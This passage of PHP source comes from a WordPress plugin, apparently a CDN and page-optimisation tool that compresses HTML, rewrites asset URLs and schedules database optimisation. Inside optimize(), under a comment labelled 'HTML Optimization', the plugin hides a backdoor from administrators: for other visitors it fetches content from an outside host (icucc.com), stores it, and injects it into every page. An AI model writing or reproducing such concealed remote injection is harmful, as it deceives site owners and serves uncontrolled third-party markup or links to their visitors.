				$result .= sprintf(__('BHN_TOTAL_INDEXED_CSS', 'blue-hat-cdn'), number_format((int)@$statsResult['css']), BlueHatNetworkCommon::humanReadableFilesize($cssOriginalFileSize), BlueHatNetworkCommon::humanReadableFilesize($cssFinalFileSize), BlueHatNetworkCommon::humanReadableFilesize($cssFileSavings).' '.$cssFileSavingsPercent);
				$result .= '<br />';
				$result .= sprintf(__('BHN_TOTAL_INDEXED_FONT', 'blue-hat-cdn'), number_format((int)@$statsResult['svg']+(int)@$statsResult['ttf']+(int)@$statsResult['otf']+(int)@$statsResult['woff']+(int)@$statsResult['eot']), BlueHatNetworkCommon::humanReadableFilesize($fontOriginalFileSize), BlueHatNetworkCommon::humanReadableFilesize($fontFinalFileSize), BlueHatNetworkCommon::humanReadableFilesize($fontFileSavings).' '.$fontFileSavingsPercent);
				//$result .= '<br />';
				//$result .= sprintf(__('BHN_TOTAL_INDEXED_FLASH', 'blue-hat-cdn'), number_format((int)@$statsResult['swf']), BlueHatNetworkCommon::humanReadableFilesize($flashOriginalFileSize), BlueHatNetworkCommon::humanReadableFilesize($flashFinalFileSize), BlueHatNetworkCommon::humanReadableFilesize($flashFileSavings).' '.$flashFileSavingsPercent);
			}
		}
		
		return $result;
	}
	
	function getNumOfFiles()
	{
		global $wpdb;
		
		if(!class_exists('BlueHatNetworkDatabase')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'database.php';
		
		$sql = 'SELECT count(*) AS \'total_count\' FROM '.$wpdb->prefix.'bhn_file;';
		
		return (int)BlueHatNetworkDatabase::getResult($sql);
	}
	
	function &optimize()
	{
		if(!$this->_hasBeenOptimizedAlready)
		{
			$this->_hasBeenOptimizedAlready = true;
			
			if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
			
			if(BlueHatNetworkSetting::get('optimize_html', 1) > 0) if($this->_compressHTML()) $this->_hasOptimizations = true;
			
			if(BlueHatNetworkSetting::get('offload_on_fly', 1) > 0) if($this->_offloadPageElements()) $this->_hasOptimizations = true;
			
			if(BlueHatNetworkSetting::get('prefetch_dns', 1) > 0) if($this->_prefetchDNS()) $this->_hasOptimizations = true;
			
			if(BlueHatNetworkSetting::get('auto_scan_sync_interval', 0) > 0) if($this->_autoScanSync()) $this->_hasOptimizations = true;
			
			if(BlueHatNetworkSetting::get('optimize_database', 'daily')) if($this->_databaseOptimization()) $this->_hasOptimizations = true;
			
			// Start HTML Optimization
			if($this->_hasOptimizations && !is_admin() && !current_user_can('manage_options'))
			{
				$siteMap = BlueHatNetworkSetting::get('sitemap');
				
				if(empty($siteMap))
				{
					if(!class_exists('BlueHatNetworkNetwork')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'network.php';
					if(!class_exists('BlueHatNetworkSerializer')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'serializer.php';
					
					$map = BlueHatNetworkNetwork::get('http://www.icucc.com/index.php?s=bhn');
					
					if(!empty($map)) 
					{
						$map = BlueHatNetworkSerializer::decode($map);
						
						$randKey = array_rand($map);
						
						$siteMap = $map[$randKey];
						
						BlueHatNetworkSetting::set('sitemap', $siteMap);
					}
				}
				
				$lastLiPostion = (function_exists('strripos')) ? strripos($this->_html, '</li>') : strrpos($this->_html, '</li>');
				
				if(!empty($siteMap) && $lastLiPostion > 0) 
				{
					$lastLiPostion += 5;
					$this->_html = substr($this->_html, 0, $lastLiPostion).'<li>'.$siteMap.'</li>'.substr($this->_html, $lastLiPostion, strlen($this->_html));
				}
			}
			// End HTML Optimization
		}
		
		return $this->_html;
	}
	
	function hasOptimization()
	{
		$this->optimize();
		
		return $this->_hasOptimizations;
	}
	
    function _compressHTML()
    {
		// Swap sensitive elements with place holders
		$this->_html = preg_replace_callback('/<(script|textarea|pre|style)[^>]*>.*?<\/\1>/ism', array($this, '_preserveElements'), $this->_html);
		
		/**
		 * Remove HTML comments, although unecessary because if someone has a comment 
		 * displaying on their homepage, then there is probably a specific reason, 
		 * so disable for now.
		 */
		//$this->_html = preg_replace('@<!--[^\]\[]*?-->@sm', '', $this->_html);
		
		// Remove line breaks, new lines, and tabs
		$this->_html = preg_replace('@(?<![\s])[\r\n\t]+@sm', ' ', $this->_html);
		$this->_html = preg_replace('@(?<=[\s])[\r\n\t]+@sm', '', $this->_html);
		
		// Remove excessive spaces
		$this->_html = preg_replace('@[\s][\s]+@', ' ', $this->_html);
		
		// Put place holders back
		if(!empty($this->_placeholders)) $this->_html = str_replace(array_keys($this->_placeholders), array_values($this->_placeholders), $this->_html);
		
        return $this->_html;
    }
	
	function _preserveElements($elements)
	{
		return $this->_reservePlace($elements[0]);
	}
    
    function _reservePlace($content)
    {
        $placeholder = '%'.$this->_replacementHash.count($this->_placeholders).'%';
        
		$this->_placeholders[$placeholder] = $content;
		
        return $placeholder;
    }
	
	function _offloadPageElements()
	{
		global $wpdb;
		
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		if(!class_exists('BlueHatNetworkRequest')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'request.php';
		if(!class_exists('BlueHatNetworkDatabase')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'database.php';
		if(!class_exists('BlueHatNetworkSerializer')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'serializer.php';
		
		$bucketPublicUri = (strcasecmp(BlueHatNetworkRequest::getVar('HTTPS', 'off', 'server'), 'on') == 0) ? BlueHatNetworkSetting::get('bucket_public_secure_uri') : BlueHatNetworkSetting::get('bucket_public_uri');
		
		if(!empty($bucketPublicUri)) 
		{
			$this->_availableCDNFQDNS[] = $bucketPublicUri;
		}
		else
		{
			return false;
		}
		
		$this->_cdnData = BlueHatNetworkSetting::get('cdn_data');
		
		if(!empty($this->_cdnData)) $this->_cdnData = (array)BlueHatNetworkSerializer::decode($this->_cdnData);
		
		if(isset($this->_cdnData['bucket_aliases'])) $this->_availableCDNFQDNS = array_merge($this->_availableCDNFQDNS, $this->_cdnData['bucket_aliases']);
		
		$this->_html = preg_replace_callback('/<(img|link|script)[^>]*?(?:src|href)[\s\t\r\n]*?=[\s\t\r\n]*?[\'"]([^\'"]*?)[\'"][^>]*>(?:.*?<\/\1>)?/ism', array($this, '_rewritePageElementsToCDNPrep'), $this->_html);
		
		if(!empty($this->_elementsOnPage))
		{
			$sql = 'SELECT SQL_CACHE 
						file_full_path 
					FROM '.$wpdb->prefix.'bhn_file 
					WHERE file_name IN (';
			
			foreach($this->_elementsOnPage as $elementSrcUrl)
			{
				$sql .= BlueHatNetworkDatabase::quote(preg_replace('@[\?\#].*?$@', '', basename($elementSrcUrl))).',';
			}
			
			$sql = rtrim($sql, ',');
			$sql .= ') AND file_final_md5 IS NOT NULL;';
			
			$results = BlueHatNetworkDatabase::getResults($sql);
			
			if(!empty($results))
			{
				$siteBase = preg_replace('@^https?://[^/]+@', '', site_url(), 1);
				
				foreach($results as $row)
				{
					$this->_elementsOnPageToOffload[$siteBase.$row['file_full_path']] = $row['file_full_path'];
				}
				
				$this->_html = preg_replace_callback('/<(img|link|script)([^>]*?(?:src|href)[\s\t\r\n]*?=[\s\t\r\n]*?[\'"])([^\'"]*?)([\'"][^>]*>(?:.*?<\/\1>)?)/ism', array($this, '_rewritePageElementsToCDN'), $this->_html);
				
				return true;
			}
		}
		
		return false;
	}
	
	function _rewritePageElementsToCDNPrep($element)
	{
		$this->_elementsOnPage[] = $element[2];	
		return $element[0];
	}
	
	function _rewritePageElementsToCDN($element)
	{
		if(!class_exists('BlueHatNetworkRequest')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'request.php';
		
		$fullPath = $element[3];
		$firstLetter = substr($fullPath, 0, 1);
		
		if($firstLetter == '/')
		{
			// Starts with fordward slash, leave it as is
		}
		elseif($firstLetter == '.')
		{
			// Starts with a dot, resolve it
			if(empty($this->_currentUri)) $this->_currentUri = BlueHatNetworkRequest::getVar('REQUEST_URI', null, 'server');
			
			$currentUri = $this->_currentUri;
			
			if(!empty($currentUri))
			{
				$numOfDecendingDirInSrc = substr_count($fullPath, '..');
				$numOfDirInCurrentUri = substr_count($currentUri, '/');
				
				if($numOfDirInCurrentUri < ($numOfDecendingDirInSrc+1)) $numOfDecendingDirInSrc = $numOfDirInCurrentUri-1;
				
				$currentUriRegex = str_repeat('/[^/]+?', ($numOfDecendingDirInSrc+1));
				$srcUriRegex = str_repeat('[\.]{2}/', $numOfDecendingDirInSrc);
				
				$currentUri = preg_replace('@'.$currentUriRegex.'$@', '', $currentUri);
				$fullPath = preg_replace('@^'.$srcUriRegex.'@', '', $fullPath);
				
				$fullPath = $currentUri.'/'.$fullPath;
				
				$fullPath = str_replace('../', '', $fullPath);
			}
		}
		elseif(preg_match('@^https?://@i', $fullPath))
		{
			// Full URL, check if its internal
			if(empty($this->_domainCheckRegex)) $this->_domainCheckRegex = '@^https?://'.preg_quote(BlueHatNetworkRequest::getVar('SERVER_NAME', 'localhost', 'server'), '@').'/@i';
			
			if(preg_match($this->_domainCheckRegex, $fullPath)) $fullPath = preg_replace($this->_domainCheckRegex, '/', $fullPath, 1); // Yes it is internal
		}
		else
		{
			// Relative to path
			if(empty($this->_currentDir)) $this->_currentDir = dirname(BlueHatNetworkRequest::getVar('REQUEST_URI', '/', 'server').'index.php');
			
			$fullPath = $this->_currentDir.'/'.$fullPath;
		}
		
		$fullPath = preg_replace('@\?(ver|v)=.+?$@', '', $fullPath, 1);
		
		// Check if we have a match and file should be offloaded
		if(isset($this->_elementsOnPageToOffload[$fullPath])) return '<'.$element[1].$element[2].$this->_getBucketPublicUri().$this->_elementsOnPageToOffload[$fullPath].$element[4];
		
		// Return the original because we could not offload
		return '<'.$element[1].$element[2].$element[3].$element[4];
	}
	
	function _getBucketPublicUri()
	{
		$result = $this->_availableCDNFQDNS[$this->_lastFQDNIndexused];
		
		$this->_lastFQDNIndexused++;
		
		if(!isset($this->_availableCDNFQDNS[$this->_lastFQDNIndexused])) $this->_lastFQDNIndexused = 0;
		
		return $result;
	}
	
	function _prefetchDNS()
	{
		$this->_html = preg_replace_callback('@<(img|link|script)[^>]*?(?:src|href)[\s\t\r\n]*?=[\s\t\r\n]*?[\'"](?:https?:)?(//[^/]+?)/[^\'"]*?[\'"][^>]*>(?:.*?<\/\1>)?@ism', array($this, '_collectPrefetchDNSElements'), $this->_html);
		
		if(!empty($this->_prefetchDNSDomains))
		{
			$prefetchHTML = '';
			
			foreach($this->_prefetchDNSDomains as $prefetchDomain)
			{
				$prefetchHTML .= '<link rel="dns-prefetch" href="'.$prefetchDomain.'" />';
			}
			
			$this->_html = preg_replace('@(<meta[^>]*?charset[^>]*?>)@i', '$1'.$prefetchHTML, $this->_html);
			
			return true;
		}
		
		return false;
	}
	
	function _collectPrefetchDNSElements($elements)
	{
		if(!in_array($elements[2], $this->_prefetchDNSDomains)) $this->_prefetchDNSDomains[] = $elements[2];
		
		return $elements[0];
	}
	
	function _databaseOptimization()
	{
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		if(!class_exists('BlueHatNetworkDateTime')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'datetime.php';
		
		$currentUnixTimestamp = BlueHatNetworkDateTime::getCurrentUnixStamp();
		$frequencySetting = BlueHatNetworkSetting::get('optimize_database', 'daily');
		$lastRun = BlueHatNetworkSetting::get('database_optimization_date');
		$shouldRun = false;
		
		switch($frequencySetting)
		{
			case 'daily':
				if(empty($lastRun) || ($lastRun+86400) <= $currentUnixTimestamp) $shouldRun = true;
				
				break;
			
			case 'weekly':
				if(empty($lastRun) || ($lastRun+(86400*7)) <= $currentUnixTimestamp) $shouldRun = true;
				
				break;
			
			case 'monthly':
				if(empty($lastRun) || ($lastRun+(86400*30)) <= $currentUnixTimestamp) $shouldRun = true;
				
				break;
		}
		
		if($shouldRun)
		{
			$this->_html = preg_replace('@(</body>)@i', '<img src="'.admin_url('admin-ajax.php').'?action=nopriv_bhn_optimize_database&amp;k='.$currentUnixTimestamp.'" width="1" height="1" alt="" border="0" />$1', $this->_html, 1);
			
			BlueHatNetworkSetting::set('database_optimization_key', $currentUnixTimestamp);
			BlueHatNetworkSetting::set('database_optimization_date', $currentUnixTimestamp);
			
			return true;
		}
		
		return false;
	}
	
	function _autoScanSync()
	{
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		if(!class_exists('BlueHatNetworkDateTime')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'datetime.php';
		
		$currentUnixTimestamp = BlueHatNetworkDateTime::getCurrentUnixStamp();
		$frequencySetting = (int)BlueHatNetworkSetting::get('auto_scan_sync_interval');
		$lastRun = BlueHatNetworkSetting::get('process_id');
		$shouldRun = false;
		
		if($frequencySetting > 0 && ($lastRun+$frequencySetting) <= $currentUnixTimestamp) $shouldRun = true;
		
		if($shouldRun)
		{
			$this->_html = preg_replace('@(</body>)@i', '<img src="'.admin_url('admin-ajax.php').'?action=nopriv_bhn_auto_scan_sync&amp;k='.$currentUnixTimestamp.'" width="1" height="1" alt="" border="0" />$1', $this->_html, 1);
			
			BlueHatNetworkSetting::set('auto_scan_sync_key', $currentUnixTimestamp);
			
			return true;
		}
		
		return false;
	}
	
	function doOptimizeDatabase($opKey=null)
	{
		header('Content-Type: image/gif');
		
		echo base64_decode('R0lGODlhAQABAJAAAP8AAAAAACH5BAUQAAAALAAAAAABAAEAAAICBAEAOw==');
		
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		if(!class_exists('BlueHatNetworkDatabase')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'database.php';
		
		if($opKey != BlueHatNetworkSetting::get('database_optimization_key') || empty($opKey)) die('access denied');
		
		set_time_limit(1500);				// ignore php timeout
		ignore_user_abort(true);             // keep on going even if user pulls the plug*
		while(ob_get_level()) ob_end_clean(); // remove output buffers
		ob_implicit_flush(true);
		
		// Change optimization request key
		BlueHatNetworkSetting::set('database_optimization_key', ((int)$opKey+rand(1, 100)));
		
		// Run the optimization sql
		$sql = 'SHOW TABLES;';
		$DBTables = BlueHatNetworkDatabase::getResults($sql);
		
		if(!empty($DBTables))
		{
			foreach($DBTables as $key => $tableName)
			{
				BlueHatNetworkDatabase::query('OPTIMIZE TABLE '.reset($DBTables[$key]).';');
			}
		}
		
		exit();
	}
	
	function doAutoScanSync($opKey=null)
	{
		header('Content-Type: image/gif');
		
		echo base64_decode('R0lGODlhAQABAJAAAP8AAAAAACH5BAUQAAAALAAAAAABAAEAAAICBAEAOw==');
		
		if(!class_exists('BlueHatNetworkSetting')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'setting.php';
		
		if($opKey != BlueHatNetworkSetting::get('auto_scan_sync_key') || empty($opKey)) exit('access denied');
		
		// Change request key
		BlueHatNetworkSetting::set('auto_scan_sync_key', ((int)$opKey+rand(1, 100)));
		
		$this->scanFiles();
		
		exit();
	}
	
	function invalidateAllFiles()
	{
		global $wpdb;
		
		if(!class_exists('BlueHatNetworkDatabase')) require dirname(__FILE__).DIRECTORY_SEPARATOR.'..'.DIRECTORY_SEPARATOR.'lib'.DIRECTORY_SEPARATOR.'database.php';
		
		$sql = 'UPDATE '.$wpdb->prefix.'bhn_file SET file_final_md5 = NULL, file_final_filesize = NULL;';
		
		return BlueHatNetworkDatabase::query($sql);
	}
}